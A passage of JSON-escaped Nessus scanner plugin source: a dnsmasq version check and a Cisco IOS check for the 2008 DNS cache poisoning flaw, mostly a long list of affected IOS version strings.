script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/09/08\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:thekelleys:dnsmasq\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2018 Tenable Network Security, Inc.\");\n script_family(english:\"DNS\");\n\n script_dependencie(\"dns_version.nasl\");\n script_require_keys(\"dns_server/version\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/dns\", 53);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"global_settings.inc\");\n\napp_name = \"dnsmasq\";\n\nport = get_kb_item(\"Services/udp/dns\");\nif (!port) port = 53;\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\n# dnsmasq replies to BIND.VERSION\nversion = get_kb_item_or_exit(\"dns_server/version\");\nversion = tolower(version);\ndisplay_version = version;\n\nif (version !~ \"dnsmasq-(v)?\")\n audit(AUDIT_NOT_LISTEN, app_name, port);\n\nversion = ereg_replace(pattern:\"^dnsmasq-(v)?(.*)$\", replace:\"\\2\", string:version);\n\nif (version == '2')\n audit(AUDIT_VER_NOT_GRANULAR, app_name, port, display_version);\n\nif (version =~ \"^(2\\.43([^0-9]|$))$\")\n{\n report = '\\n' +\n '\\n Installed version : ' + display_version +\n '\\n Fixed version : dnsmasq-2.45' +\n '\\n';\n security_report_v4(port:53, proto:\"udp\", severity:SECURITY_WARNING, extra:report);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, app_name, port, display_version, 'udp');\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-03-17T22:54:02", "description": "Multiple Cisco products are vulnerable to DNS cache poisoning attacks\ndue to their use of insufficiently randomized DNS transaction IDs and\nUDP source ports in the DNS queries that they produce, which may allow\nan attacker to more easily forge DNS answers that can poison DNS\ncaches.\nTo exploit this vulnerability an attacker must be able to cause a\nvulnerable DNS server to perform recursive DNS queries. Therefore, DNS\nservers that are only authoritative, or servers where recursion is not\nallowed, are not affected.\nCisco has released free software updates that address these\nvulnerabilities.\n", "edition": 11, "published": "2010-09-01T00:00:00", "title": "Multiple Cisco Products Vulnerable to DNS Cache Poisoning Attacks", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-1447"], "modified": "2010-09-01T00:00:00", "cpe": ["cpe:/o:cisco:ios"], "id": "CISCO-SA-20080708-DNSHTTP.NASL", "href": "https://www.tenable.com/plugins/nessus/49017", "sourceData": "#TRUSTED 0e4ba3fa7fb7a68c0ee374a364d1b7b39a71b3b4cf500396a65a34847485fe1de7c0b0525bdbd34e04ba3a93f16d5436e60e85d03d0d11f7099a8bcef7f9e6f20e2601b7b63d21fb4fb748535da71aaf2351bd21fd8253e86b517baf85787208908da641046e5194c190ed39f5cc2bb016bed278868b84c90a37cfeb77a2bc8a840801c3bd967268e48f9d8694b2c98f86d0f7183c5a5f6207baee846e251dfdad881597b4b9ca7efac3e118fd86af6d08d8333de59133a62e3cfc2d5f2fb7a51deda23f233c5561065387cac2d22173e6d355505338acf81e97bcdcc82ef19e8e782263cc9e3a18139edfb1f67826974babc15e9001c0a02b7e2dccb3875604bd2525631dea1f19b748a1a577c495e48765df8bbcb9445815e1271f2adc808a0d3a5bc5842b40ef801da400ef216a1dbc4a72f6abbf4bb4c89433301e270d7e726161299e01a5675429eef304c3cebd9523dbca17aa730b1b9ee49fae983836b3feab7efaf4b4af997da7a69728fb4259f22b6a23a7c641735adebab29232ca2f4f2916233952c8a5a9da55c7cd9ca5122fb55838f771e2f2a473600ec963c743ce456914cda9d990d458794993fc681163156be4790491df305b304053875faed33a48416f1e9e0aad12483753326ad578958204250dab93d53386722b36d64a3627de7cb29f6cf543a1b5432d2d8b8a854d71d2510e20ef2126de56d49cf4\n#\n# (C) Tenable Network Security, Inc.\n#\n# Security advisory is (C) CISCO, Inc.\n# See https://www.cisco.com/en/US/products/products_security_advisory09186a00809c2168.shtml\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(49017);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2018/11/15\");\n script_cve_id(\"CVE-2008-1447\");\n script_bugtraq_id(30131);\n script_xref(name:\"CERT\", value:\"800113\");\n script_xref(name:\"IAVA\", value:\"2008-A-0045\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCso81854\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCsq01298\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCsq21930\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCsr28008\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCsr28354\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCsr29124\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCsr29691\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCsr61220\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCsr98689\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCsu10546\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-20080708-dns\");\n script_name(english:\"Multiple Cisco Products Vulnerable to DNS Cache Poisoning Attacks\");\n script_summary(english:\"Checks the IOS version.\");\n script_set_attribute(attribute:\"synopsis\", value:\"The remote device is missing a vendor-supplied security patch.\");\n script_set_attribute(attribute:\"description\", value:\n'Multiple Cisco products are vulnerable to DNS cache poisoning attacks\ndue to their use of insufficiently randomized DNS transaction IDs and\nUDP source ports in the DNS queries that they produce, which may allow\nan attacker to more easily forge DNS answers that can poison DNS\ncaches.\nTo exploit this vulnerability an attacker must be able to cause a\nvulnerable DNS server to perform recursive DNS queries. Therefore, DNS\nservers that are only authoritative, or servers where recursion is not\nallowed, are not affected.\nCisco has released free software updates that address these\nvulnerabilities.\n');\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?2e77e5a8\");\n # https://www.cisco.com/en/US/products/products_security_advisory09186a00809c2168.shtml\n script_set_attribute(attribute:\"see_also\", value: \"http://www.nessus.org/u?428cc712\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the relevant patch referenced in Cisco Security Advisory\ncisco-sa-20080708-dns.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'DNS BailiWicked Host Attack');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:cisco:ios\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/07/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/07/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/09/01\");\n\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is (C) 2010-2018 Tenable Network Security, Inc.\");\n script_family(english:\"CISCO\");\n script_dependencie(\"cisco_ios_version.nasl\");\n script_require_keys(\"Host/Cisco/IOS/Version\");\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"cisco_func.inc\");\ninclude(\"cisco_kb_cmd_func.inc\");\n\nflag = 0;\noverride = 0;\nversion = get_kb_item_or_exit(\"Host/Cisco/IOS/Version\");\n\nif (version == '12.4(15)XZ') flag++;\nelse if (version == '12.4(15)XY2') flag++;\nelse if (version == '12.4(15)XY1') flag++;\nelse if (version == '12.4(15)XY') flag++;\nelse if (version == '12.4(11)XW7') flag++;\nelse if (version == '12.4(11)XW6') flag++;\nelse if (version == '12.4(11)XW5') flag++;\nelse if (version == '12.4(11)XW4') flag++;\nelse if (version == '12.4(11)XW3') flag++;\nelse if (version == '12.4(11)XW2') flag++;\nelse if (version == '12.4(11)XW1') flag++;\nelse if (version == '12.4(11)XW') flag++;\nelse if (version == '12.4(11)XV1') flag++;\nelse if (version == '12.4(11)XV') flag++;\nelse if (version == '12.4(6)XT2') flag++;\nelse if (version == '12.4(6)XT1') flag++;\nelse if (version == '12.4(6)XT') flag++;\nelse if (version == '12.4(15)XQ') flag++;\nelse if (version == '12.4(15)XN') flag++;\nelse if (version == '12.4(15)XM') flag++;\nelse if (version == '12.4(15)XL1') flag++;\nelse if (version == '12.4(15)XL') flag++;\nelse if (version == '12.4(11)XJ4') flag++;\nelse if (version == '12.4(11)XJ3') flag++;\nelse if (version == '12.4(11)XJ2') flag++;\nelse if (version == '12.4(11)XJ') flag++;\nelse if (version == '12.4(6)XE3') flag++;\nelse if (version == '12.4(6)XE2') flag++;\nelse if (version == '12.4(6)XE1') flag++;\nelse if (version == '12.4(6)XE') flag++;\nelse if (version == '12.4(4)XD9') flag++;\nelse if (version == '12.4(4)XD8') flag++;\nelse if (version == '12.4(4)XD7') flag++;\nelse if (version == '12.4(4)XD5') flag++;\nelse if (version == '12.4(4)XD4') flag++;\nelse if (version == '12.4(4)XD2') flag++;\nelse if (version == '12.4(4)XD10') flag++;\nelse if (version == '12.4(4)XD1') flag++;\nelse if (version == '12.4(4)XD') flag++;\nelse if (version == '12.4(4)XC7') flag++;\nelse if (version == '12.4(4)XC6') flag++;\nelse if (version == '12.4(4)XC5') flag++;\nelse if (version == '12.4(4)XC4') flag++;\nelse if (version == '12.4(4)XC3') flag++;\nelse if (version == '12.4(4)XC2') flag++;\nelse if (version == '12.4(4)XC1') flag++;\nelse if (version == '12.4(4)XC') flag++;\nelse if (version == '12.4(2)XB6') flag++;\nelse if (version == '12.4(2)XA2') flag++;\nelse if (version == '12.4(2)XA1') flag++;\nelse if (version == '12.4(2)XA') flag++;\nelse if (version == '12.4(15)T5') flag++;\nelse if (version == '12.4(15)T4') flag++;\nelse if (version == '12.4(15)T3') flag++;\nelse if (version == '12.4(15)T2') flag++;\nelse if (version == '12.4(15)T1') flag++;\nelse if (version == '12.4(15)T') flag++;\nelse if (version == '12.4(11)T4') flag++;\nelse if (version == '12.4(11)T3') flag++;\nelse if (version == '12.4(11)T2') flag++;\nelse if (version == '12.4(11)T1') flag++;\nelse if (version == '12.4(11)T') flag++;\nelse if (version == '12.4(9)T7') flag++;\nelse if (version == '12.4(9)T6') flag++;\nelse if (version == '12.4(9)T5') flag++;\nelse if (version == '12.4(9)T4') flag++;\nelse if (version == '12.4(9)T3') flag++;\nelse if (version == '12.4(9)T2') flag++;\nelse if (version == '12.4(9)T1') flag++;\nelse if (version == '12.4(9)T') flag++;\nelse if (version == '12.4(6)T9') flag++;\nelse if (version == '12.4(6)T8') flag++;\nelse if (version == '12.4(6)T7') flag++;\nelse if (version == '12.4(6)T6') flag++;\nelse if (version == '12.4(6)T5') flag++;\nelse if (version == '12.4(6)T4') flag++;\nelse if (version == '12.4(6)T3') flag++;\nelse if (version == '12.4(6)T2') flag++;\nelse if (version == '12.4(6)T11') flag++;\nelse if (version == '12.4(6)T10') flag++;\nelse if (version == '12.4(6)T1') flag++;\nelse if (version == '12.4(6)T') flag++;\nelse if (version == '12.4(4)T8') flag++;\nelse if (version == '12.4(4)T7') flag++;\nelse if (version == '12.4(4)T6') flag++;\nelse if (version == '12.4(4)T5') flag++;\nelse if (version == '12.4(4)T4') flag++;\nelse if (version == '12.4(4)T3') flag++;\nelse if (version == '12.4(4)T2') flag++;\nelse if (version == '12.4(4)T1') flag++;\nelse if (version == '12.4(4)T') flag++;\nelse if (version == '12.4(2)T6') flag++;\nelse if (version == '12.4(2)T5') flag++;\nelse if (version == '12.4(2)T4') flag++;\nelse if (version == '12.4(2)T3') flag++;\nelse if (version == '12.4(2)T2') flag++;\nelse if (version == '12.4(2)T1') flag++;\nelse if (version == '12.4(2)T') flag++;\nelse if (version == '12.4(15)SW1') flag++;\nelse if (version == '12.4(15)SW') flag++;\nelse if (version == '12.4(11)SW3') flag++;\nelse if (version == '12.4(11)SW2') flag++;\nelse if (version == '12.4(11)SW1') flag++;\nelse if (version == '12.4(11)SW') flag++;\nelse if (version == '12.4(16)MR2') flag++;\nelse if (version == '12.4(16)MR1') flag++;\nelse if (version == '12.4(16)MR') flag++;\nelse if (version == '12.4(12)MR2') flag++;\nelse if (version == '12.4(11)MD4') flag++;\nelse if (version == '12.4(11)MD3') flag++;\nelse if (version == '12.4(11)MD2') flag++;\nelse if (version == '12.4(11)MD1') flag++;\nelse if (version == '12.4(11)MD') flag++;\nelse if (version == '12.4(19)') flag++;\nelse if (version == '12.4(18a)') flag++;\nelse if (version == '12.4(18)') flag++;\nelse if (version == '12.4(17b)') flag++;\nelse if (version == '12.4(17a)') flag++;\nelse if (version == '12.4(17)') flag++;\nelse if (version == '12.4(16b)') flag++;\nelse if (version == '12.4(16a)') flag++;\nelse if (version == '12.4(16)') flag++;\nelse if (version == '12.4(13f)') flag++;\nelse if (version == '12.4(13e)') flag++;\nelse if (version == '12.4(13d)') flag++;\nelse if (version == '12.4(13c)') flag++;\nelse if (version == '12.4(13b)') flag++;\nelse if (version == '12.4(13a)') flag++;\nelse if (version == '12.4(13)') flag++;\nelse if (version == '12.4(12c)') flag++;\nelse if (version == '12.4(12b)') flag++;\nelse if (version == '12.4(12a)') flag++;\nelse if (version == '12.4(12)') flag++;\nelse if (version == '12.4(10c)') flag++;\nelse if (version == '12.4(10b)') flag++;\nelse if (version == '12.4(10a)') flag++;\nelse if (version == '12.4(10)') flag++;\nelse if (version == '12.4(8d)') flag++;\nelse if (version == '12.4(8c)') flag++;\nelse if (version == '12.4(8b)') flag++;\nelse if (version == '12.4(8a)') flag++;\nelse if (version == '12.4(8)') flag++;\nelse if (version == '12.4(7h)') flag++;\nelse if (version == '12.4(7g)') flag++;\nelse if (version == '12.4(7f)') flag++;\nelse if (version == '12.4(7e)') flag++;\nelse if (version == '12.4(7d)') flag++;\nelse if (version == '12.4(7c)') flag++;\nelse if (version == '12.4(7b)') flag++;\nelse if (version == '12.4(7a)') flag++;\nelse if (version == '12.4(7)') flag++;\nelse if (version == '12.4(5c)') flag++;\nelse if (version == '12.4(5b)') flag++;\nelse if (version == '12.4(5a)') flag++;\nelse if (version == '12.4(5)') flag++;\nelse if (version == '12.4(3j)') flag++;\nelse if (version == '12.4(3i)') flag++;\nelse if (version == '12.4(3h)') flag++;\nelse if (version == '12.4(3g)') flag++;\nelse if (version == '12.4(3f)') flag++;\nelse if (version == '12.4(3e)') flag++;\nelse if (version == '12.4(3d)') flag++;\nelse if (version == '12.4(3c)') flag++;\nelse if (version == '12.4(3b)') flag++;\nelse if (version == '12.4(3a)') flag++;\nelse if (version == '12.4(3)') flag++;\nelse if (version == '12.4(1c)') flag++;\nelse if (version == '12.4(1b)') flag++;\nelse if (version == '12.4(1a)') flag++;\nelse if (version == '12.4(1)') flag++;\nelse if (version == '12.3(8)ZA') flag++;\nelse if (version == '12.3(11)YZ2') flag++;\nelse if (version == '12.3(11)YZ1') flag++;\nelse if (version == '12.3(11)YZ') flag++;\nelse if (version == '12.3(14)YX9') flag++;\nelse if (version == '12.3(14)YX8') flag++;\nelse if (version == '12.3(14)YX7') flag++;\nelse if (version == '12.3(14)YX4') flag++;\nelse if (version == '12.3(14)YX3') flag++;\nelse if (version == '12.3(14)YX2') flag++;\nelse if (version == '12.3(14)YX11') flag++;\nelse if (version == '12.3(14)YX10') flag++;\nelse if (version == '12.3(14)YX1') flag++;\nelse if (version == '12.3(14)YX') flag++;\nelse if (version == '12.3(14)YU1') flag++;\nelse if (version == '12.3(14)YT1') flag++;\nelse if (version == '12.3(14)YT') flag++;\nelse if (version == '12.3(11)YS2') flag++;\nelse if (version == '12.3(11)YS1') flag++;\nelse if (version == '12.3(11)YS') flag++;\nelse if (version == '12.3(11)YK3') flag++;\nelse if (version == '12.3(11)YK2') flag++;\nelse if (version == '12.3(11)YK1') flag++;\nelse if (version == '12.3(11)YK') flag++;\nelse if (version == '12.3(8)YI3') flag++;\nelse if (version == '12.3(8)YI2') flag++;\nelse if (version == '12.3(8)YI1') flag++;\nelse if (version == '12.3(8)YH') flag++;\nelse if (version == '12.3(8)YG6') flag++;\nelse if (version == '12.3(8)YG5') flag++;\nelse if (version == '12.3(8)YG4') flag++;\nelse if (version == '12.3(8)YG3') flag++;\nelse if (version == '12.3(8)YG2') flag++;\nelse if (version == '12.3(8)YG1') flag++;\nelse if (version == '12.3(8)YG') flag++;\nelse if (version == '12.3(11)YF4') flag++;\nelse if (version == '12.3(11)YF3') flag++;\nelse if (version == '12.3(11)YF1') flag++;\nelse if (version == '12.3(11)YF') flag++;\nelse if (version == '12.3(8)YD1') flag++;\nelse if (version == '12.3(8)YD') flag++;\nelse if (version == '12.3(8)YA1') flag++;\nelse if (version == '12.3(8)YA') flag++;\nelse if (version == '12.3(2)XZ2') flag++;\nelse if (version == '12.3(8)XX2d') flag++;\nelse if (version == '12.3(8)XX1') flag++;\nelse if (version == '12.3(8)XX') flag++;\nelse if (version == '12.3(8)XW3') flag++;\nelse if (version == '12.3(8)XW2') flag++;\nelse if (version == '12.3(8)XW1') flag++;\nelse if (version == '12.3(8)XW') flag++;\nelse if (version == '12.3(7)XS2') flag++;\nelse if (version == '12.3(7)XS1') flag++;\nelse if (version == '12.3(7)XS') flag++;\nelse if (version == '12.3(7)XR7') flag++;\nelse if (version == '12.3(7)XR6') flag++;\nelse if (version == '12.3(7)XR5') flag++;\nelse if (version == '12.3(7)XR4') flag++;\nelse if (version == '12.3(7)XR3') flag++;\nelse if (version == '12.3(7)XR2') flag++;\nelse if (version == '12.3(7)XR') flag++;\nelse if (version == '12.3(4)XQ1') flag++;\nelse if (version == '12.3(4)XQ') flag++;\nelse if (version == '12.3(11)XL1') flag++;\nelse if (version == '12.3(11)XL') flag++;\nelse if (version == '12.3(4)XK4') flag++;\nelse if (version == '12.3(4)XK3') flag++;\nelse if (version == '12.3(4)XK2') flag++;\nelse if (version == '12.3(4)XK1') flag++;\nelse if (version == '12.3(4)XK') flag++;\nelse if (version == '12.3(7)XJ2') flag++;\nelse if (version == '12.3(7)XJ1') flag++;\nelse if (version == '12.3(7)XJ') flag++;\nelse if (version == '12.3(7)XI8') flag++;\nelse if (version == '12.3(7)XI7b') flag++;\nelse if (version == '12.3(7)XI7a') flag++;\nelse if (version == '12.3(7)XI7') flag++;\nelse if (version == '12.3(7)XI6') flag++;\nelse if (version == '12.3(7)XI5') flag++;\nelse if (version == '12.3(7)XI4') flag++;\nelse if (version == '12.3(7)XI3') flag++;\nelse if (version == '12.3(7)XI2') flag++;\nelse if (version == '12.3(7)XI10a') flag++;\nelse if (version == '12.3(7)XI1') flag++;\nelse if (version == '12.3(4)XG5') flag++;\nelse if (version == '12.3(4)XG4') flag++;\nelse if (version == '12.3(4)XG3') flag++;\nelse if (version == '12.3(4)XG2') flag++;\nelse if (version == '12.3(4)XG1') flag++;\nelse if (version == '12.3(4)XG') flag++;\nelse if (version == '12.3(2)XF') flag++;\nelse if (version == '12.3(2)XE5') flag++;\nelse if (version == '12.3(2)XE4') flag++;\nelse if (version == '12.3(2)XE3') flag++;\nelse if (version == '12.3(2)XE2') flag++;\nelse if (version == '12.3(2)XE1') flag++;\nelse if (version == '12.3(2)XE') flag++;\nelse if (version == '12.3(4)XD4') flag++;\nelse if (version == '12.3(4)XD3') flag++;\nelse if (version == '12.3(4)XD2') flag++;\nelse if (version == '12.3(4)XD1') flag++;\nelse if (version == '12.3(4)XD') flag++;\nelse if (version == '12.3(2)XC5') flag++;\nelse if (version == '12.3(2)XC4') flag++;\nelse if (version == '12.3(2)XC3') flag++;\nelse if (version == '12.3(2)XC2') flag++;\nelse if (version == '12.3(2)XC1') flag++;\nelse if (version == '12.3(2)XC') flag++;\nelse if (version == '12.3(2)XB3') flag++;\nelse if (version == '12.3(2)XB1') flag++;\nelse if (version == '12.3(2)XB') flag++;\nelse if (version == '12.3(2)XA7') flag++;\nelse if (version == '12.3(2)XA6') flag++;\nelse if (version == '12.3(2)XA5') flag++;\nelse if (version == '12.3(2)XA4') flag++;\nelse if (version == '12.3(2)XA3') flag++;\nelse if (version == '12.3(2)XA1') flag++;\nelse if (version == '12.3(2)XA') flag++;\nelse if (version == '12.3(4)TPC11b') flag++;\nelse if (version == '12.3(4)TPC11a') flag++;\nelse if (version == '12.3(14)T7') flag++;\nelse if (version == '12.3(14)T6') flag++;\nelse if (version == '12.3(14)T5') flag++;\nelse if (version == '12.3(14)T3') flag++;\nelse if (version == '12.3(14)T2') flag++;\nelse if (version == '12.3(14)T1') flag++;\nelse if (version == '12.3(14)T') flag++;\nelse if (version == '12.3(11)T9') flag++;\nelse if (version == '12.3(11)T8') flag++;\nelse if (version == '12.3(11)T7') flag++;\nelse if (version == '12.3(11)T6') flag++;\nelse if (version == '12.3(11)T5') flag++;\nelse if (version == '12.3(11)T4') flag++;\nelse if (version == '12.3(11)T3') flag++;\nelse if (version == '12.3(11)T2') flag++;\nelse if (version == '12.3(11)T11') flag++;\nelse if (version == '12.3(11)T10') flag++;\nelse if (version == '12.3(11)T') flag++;\nelse if (version == '12.3(8)T9') flag++;\nelse if (version == '12.3(8)T8') flag++;\nelse if (version == '12.3(8)T7') flag++;\nelse if (version == '12.3(8)T6') flag++;\nelse if (version == '12.3(8)T5') flag++;\nelse if (version == '12.3(8)T4') flag++;\nelse if (version == '12.3(8)T3') flag++;\nelse if (version == '12.3(8)T11') flag++;\nelse if (version == '12.3(8)T10') flag++;\nelse if (version == '12.3(8)T1') flag++;\nelse if (version == '12.3(8)T') flag++;\nelse if (version == '12.3(7)T9') flag++;\nelse if (version == '12.3(7)T8') flag++;\nelse if (version == '12.3(7)T7') flag++;\nelse if (version == '12.3(7)T6') flag++;\nelse if (version == '12.3(7)T4') flag++;\nelse if (version == '12.3(7)T3') flag++;\nelse if (version == '12.3(7)T2') flag++;\nelse if (version == '12.3(7)T12') flag++;\nelse if (version == '12.3(7)T11') flag++;\nelse if (version == '12.3(7)T10') flag++;\nelse if (version == '12.3(7)T1') flag++;\nelse if (version == '12.3(7)T') flag++;\nelse if (version == '12.3(4)T9') flag++;\nelse if (version == '12.3(4)T8') flag++;\nelse if (version == '12.3(4)T7') flag++;\nelse if (version == '12.3(4)T6') flag++;\nelse if (version == '12.3(4)T4') flag++;\nelse if (version == '12.3(4)T3') flag++;\nelse if (version == '12.3(4)T2a') flag++;\nelse if (version == '12.3(4)T2') flag++;\nelse if (version == '12.3(4)T11') flag++;\nelse if (version == '12.3(4)T10') flag++;\nelse if (version == '12.3(4)T1') flag++;\nelse if (version == '12.3(4)T') flag++;\nelse if (version == '12.3(2)T9') flag++;\nelse if (version == '12.3(2)T8') flag++;\nelse if (version == '12.3(2)T7') flag++;\nelse if (version == '12.3(2)T6') flag++;\nelse if (version == '12.3(2)T5') flag++;\nelse if (version == '12.3(2)T4') flag++;\nelse if (version == '12.3(2)T3') flag++;\nelse if (version == '12.3(2)T2') flag++;\nelse if (version == '12.3(2)T1') flag++;\nelse if (version == '12.3(2)T') flag++;\nelse if (version == '12.3(1a)BW') flag++;\nelse if (version == '12.3(5a)B5') flag++;\nelse if (version == '12.3(5a)B4') flag++;\nelse if (version == '12.3(5a)B3') flag++;\nelse if (version == '12.3(5a)B2') flag++;\nelse if (version == '12.3(5a)B1') flag++;\nelse if (version == '12.3(5a)B') flag++;\nelse if (version == '12.3(3)B1') flag++;\nelse if (version == '12.3(3)B') flag++;\nelse if (version == '12.3(1a)B') flag++;\nelse if (version == '12.3(26)') flag++;\nelse if (version == '12.3(25)') flag++;\nelse if (version == '12.3(24a)') flag++;\nelse if (version == '12.3(24)') flag++;\nelse if (version == '12.3(23)') flag++;\nelse if (version == '12.3(22a)') flag++;\nelse if (version == '12.3(22)') flag++;\nelse if (version == '12.3(21b)') flag++;\nelse if (version == '12.3(21)') flag++;\nelse if (version == '12.3(20a)') flag++;\nelse if (version == '12.3(20)') flag++;\nelse if (version == '12.3(19a)') flag++;\nelse if (version == '12.3(19)') flag++;\nelse if (version == '12.3(18a)') flag++;\nelse if (version == '12.3(18)') flag++;\nelse if (version == '12.3(17c)') flag++;\nelse if (version == '12.3(17b)') flag++;\nelse if (version == '12.3(17a)') flag++;\nelse if (version == '12.3(17)') flag++;\nelse if (version == '12.3(16a)') flag++;\nelse if (version == '12.3(16)') flag++;\nelse if (version == '12.3(15b)') flag++;\nelse if (version == '12.3(15a)') flag++;\nelse if (version == '12.3(15)') flag++;\nelse if (version == '12.3(13b)') flag++;\nelse if (version == '12.3(13a)') flag++;\nelse if (version == '12.3(13)') flag++;\nelse if (version == '12.3(12e)') flag++;\nelse if (version == '12.3(12d)') flag++;\nelse if (version == '12.3(12c)') flag++;\nelse if (version == '12.3(12b)') flag++;\nelse if (version == '12.3(12a)') flag++;\nelse if (version == '12.3(12)') flag++;\nelse if (version == '12.3(10f)') flag++;\nelse if (version == '12.3(10e)') flag++;\nelse if (version == '12.3(10d)') flag++;\nelse if (version == '12.3(10c)') flag++;\nelse if (version == '12.3(10b)') flag++;\nelse if (version == '12.3(10a)') flag++;\nelse if (version == '12.3(10)') flag++;\nelse if (version == '12.3(9e)') flag++;\nelse if (version == '12.3(9d)') flag++;\nelse if (version == '12.3(9c)') flag++;\nelse if (version == '12.3(9b)') flag++;\nelse if (version == '12.3(9a)') flag++;\nelse if (version == '12.3(9)') flag++;\nelse if (version == '12.3(6f)') flag++;\nelse if (version == '12.3(6e)') flag++;\nelse if (version == '12.3(6c)') flag++;\nelse if (version == '12.3(6b)') flag++;\nelse if (version == '12.3(6a)') flag++;\nelse if (version == '12.3(6)') flag++;\nelse if (version == '12.3(5f)') flag++;\nelse if (version == '12.3(5e)') flag++;\nelse if (version == '12.3(5d)') flag++;\nelse if (version == '12.3(5c)') flag++;\nelse if (version == '12.3(5b)') flag++;\nelse if (version == '12.3(5a)') flag++;\nelse if (version == '12.3(5)') flag++;\nelse if (version == '12.3(3i)') flag++;\nelse if (version == '12.3(3h)') flag++;\nelse if (version == '12.3(3g)') flag++;\nelse if (version == '12.3(3f)') flag++;\nelse if (version == '12.3(3e)') flag++;\nelse if (version == '12.3(3c)') flag++;\nelse if (version == '12.3(3b)') flag++;\nelse if (version == '12.3(3a)') flag++;\nelse if (version == '12.3(3)') flag++;\nelse if (version == '12.3(1a)') flag++;\nelse if (version == '12.3(1)') flag++;\nelse if (version == '12.2(15)ZL1') flag++;\nelse if (version == '12.2(15)ZL') flag++;\nelse if (version == '12.2(15)ZJ5') flag++;\nelse if (version == '12.2(15)ZJ3') flag++;\nelse if (version == '12.2(15)ZJ2') flag++;\nelse if (version == '12.2(15)ZJ1') flag++;\nelse if (version == '12.2(15)ZJ') flag++;\nelse if (version == '12.2(13)ZH9') flag++;\nelse if (version == '12.2(13)ZH8') flag++;\nelse if (version == '12.2(13)ZH7') flag++;\nelse if (version == '12.2(13)ZH6') flag++;\nelse if (version == '12.2(13)ZH5') flag++;\nelse if (version == '12.2(13)ZH4') flag++;\nelse if (version == '12.2(13)ZH3') flag++;\nelse if (version == '12.2(13)ZH2') flag++;\nelse if (version == '12.2(13)ZH11') flag++;\nelse if (version == '12.2(13)ZH10') flag++;\nelse if (version == '12.2(13)ZH1') flag++;\nelse if (version == '12.2(13)ZH') flag++;\nelse if (version == '12.2(13)ZG') flag++;\nelse if (version == '12.2(13)ZF2') flag++;\nelse if (version == '12.2(13)ZF1') flag++;\nelse if (version == '12.2(13)ZF') flag++;\nelse if (version == '12.2(13)ZE') flag++;\nelse if (version == '12.2(13)ZD4') flag++;\nelse if (version == '12.2(13)ZD3') flag++;\nelse if (version == '12.2(13)ZD2') flag++;\nelse if (version == '12.2(13)ZD1') flag++;\nelse if (version == '12.2(13)ZD') flag++;\nelse if (version == '12.2(8)ZB8') flag++;\nelse if (version == '12.2(8)ZB7') flag++;\nelse if (version == '12.2(8)ZB6') flag++;\nelse if (version == '12.2(8)ZB5') flag++;\nelse if (version == '12.2(8)ZB4') flag++;\nelse if (version == '12.2(8)ZB3') flag++;\nelse if (version == '12.2(8)ZB2') flag++;\nelse if (version == '12.2(8)ZB1') flag++;\nelse if (version == '12.2(8)ZB') flag++;\nelse if (version == '12.2(11)YV1') flag++;\nelse if (version == '12.2(11)YV') flag++;\nelse if (version == '12.2(11)YU') flag++;\nelse if (version == '12.2(11)YT2') flag++;\nelse if (version == '12.2(11)YT1') flag++;\nelse if (version == '12.2(11)YT') flag++;\nelse if (version == '12.2(8)YN1') flag++;\nelse if (version == '12.2(8)YN') flag++;\nelse if (version == '12.2(8)YM') flag++;\nelse if (version == '12.2(8)YL') flag++;\nelse if (version == '12.2(8)YJ1') flag++;\nelse if (version == '12.2(8)YJ') flag++;\nelse if (version == '12.2(2)XU') flag++;\nelse if (version == 